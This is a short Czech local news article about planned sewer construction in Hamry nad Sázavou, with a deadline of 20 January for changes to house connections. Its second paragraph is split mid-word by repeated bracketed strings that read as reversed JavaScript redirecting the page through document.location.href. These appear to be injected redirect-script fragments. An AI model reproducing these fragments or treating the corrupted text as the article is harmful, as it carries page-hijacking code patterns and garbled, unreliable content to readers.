Rainbow page separator

Hamry čeká výstavba kanalizace, na změny je čas do 20. ledna

Středa, 22. prosince 2021

Hamry nad Sázavou / Příslib státní dotace ministerstva zemědělství podpoří dlouho chystanou výstavbu kanalizace v Hamrech. Jedná se o první etapu, jejíž začátek je připravován na jaro nadcházejícího roku s tím, že konec je v plánu na podzim 2023. Stavební práce se dotknou Horních a Dolních Hamrů s výjimkou lokality Leskovice, přičemž podrobný harmonogram s uvedením jednotlivých ulic, termínů a současně i vedení objízdných tras bude obyvatelům k dispozici v průběhu ledna.
Aktuálně mají lidé, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to až do 20. ledna, možnost prostudovat projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovou dokumentaci, která je k nahlédnutí v obecním úřadu, a ještě realizovat změny v projektech přípojek k jednotlivým nemovi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostem. Po uvedeném termínu už bude složité provádět případně úpravy či vylepšení týkající se připojení objektů k obecní kanalizaci.